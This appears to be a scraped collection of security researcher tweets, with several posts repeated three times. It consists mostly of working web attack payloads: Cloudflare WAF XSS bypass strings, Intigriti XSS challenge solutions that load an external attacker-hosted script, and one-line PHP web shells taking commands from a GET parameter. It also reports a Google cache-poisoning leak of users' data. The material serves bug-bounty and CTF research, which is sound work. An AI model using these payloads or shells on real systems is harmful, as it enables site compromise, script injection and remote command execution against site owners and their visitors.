Solution
Visit https://t.co/chDg24JGAE
If you are using Chrome, you need to move the mouse pointer anywhere inside the tab window after the text "If you are not being redirected, click here" appears. If Firefox - just leave the pointer inside the tab window and wait
#XSS
Cloudflare XSS Bypass via add 8 or more superfluous leading zeros for dec and 7 or more for hex.
Dec: <svg onload=prompt%26%230000000040document.domain)>
Hex: <svg onload=prompt%26%23x000000028;document.domain)>
#Bypass#WAF#XSS#Cloudflare#BugBountyTip
Cloudflare XSS Bypass via add 8 or more superfluous leading zeros for dec and 7 or more for hex.
Dec: <svg onload=prompt%26%230000000040document.domain)>
Hex: <svg onload=prompt%26%23x000000028;document.domain)>
#Bypass#WAF#XSS#Cloudflare#BugBountyTip
Cloudflare XSS Bypass via add 8 or more superfluous leading zeros for dec and 7 or more for hex.
Dec: <svg onload=prompt%26%230000000040document.domain)>
Hex: <svg onload=prompt%26%23x000000028;document.domain)>
#Bypass#WAF#XSS#Cloudflare#BugBountyTip
Solution for #Intigriti May #XSS Challenge:
https://t.co/AbDQNOXBhc
Where:
https://t.co/cW6mE2OVzd - link to our site with widgets.js in root
%2e%2e - firefox will stay in current path
for internal src %2e%2e will be decoded as .. to get a redirect via // to our widgets.js
Solution for #Intigriti May #XSS Challenge:
https://t.co/AbDQNOXBhc
Where:
https://t.co/cW6mE2OVzd - link to our site with widgets.js in root
%2e%2e - firefox will stay in current path
for internal src %2e%2e will be decoded as .. to get a redirect via // to our widgets.js
Solution for #Intigriti May #XSS Challenge:
https://t.co/AbDQNOXBhc
Where:
https://t.co/cW6mE2OVzd - link to our site with widgets.js in root
%2e%2e - firefox will stay in current path
for internal src %2e%2e will be decoded as .. to get a redirect via // to our widgets.js
@terjanq <?=`{$_GET[_]}`; (16 bytes) PHP shell is not the shortest. Can do without {} The shortest is <?=`$_GET[_]`; (14 bytes) if short_open_tag: Off and <?`$_GET[_]`; (13 bytes) if short_open_tag: On
New Cloudflare XSS Bypass:
<svg/OnLoad="`${prompt``}`">
Proof: https://t.co/ofJdkl8CED
A strange new solution from Cloudflare engineers. WAF will be weakened if DOM event has uppercase.
#WAF#XSS#BugBounty#BugBountyTip
I accidentally discovered that #Google showed cached data of random users who previously visited https://t.co/KfrORjum5b or particular users if they opened a map with a unique `hl` parameter value.
#Vulnerability was present from March 28 (mb earlier) to April 1
#CachePoisoning
2 solutions to the @intigriti easter challenge by @bohdansec
#.hta%253ciframe/srcdoc=<script/src="'-alert(document.domain)-'"></script>
#../index.php/%2522%253E%253Ciframe/srcdoc=<script/src="'-alert(document.domain)-'"></script>/
Two my solutions for https://t.co/8R0xhPIYT2
#.hta%253ciframe/srcdoc=<script/src="'-alert(document.domain)-'"></script>
#../index.php/%2522%253E%253Ciframe/srcdoc=<script/src="'-alert(document.domain)-'"></script>/
#BugBounty#CTF#HackWithIntigriti#WriteUp#EasterChallenge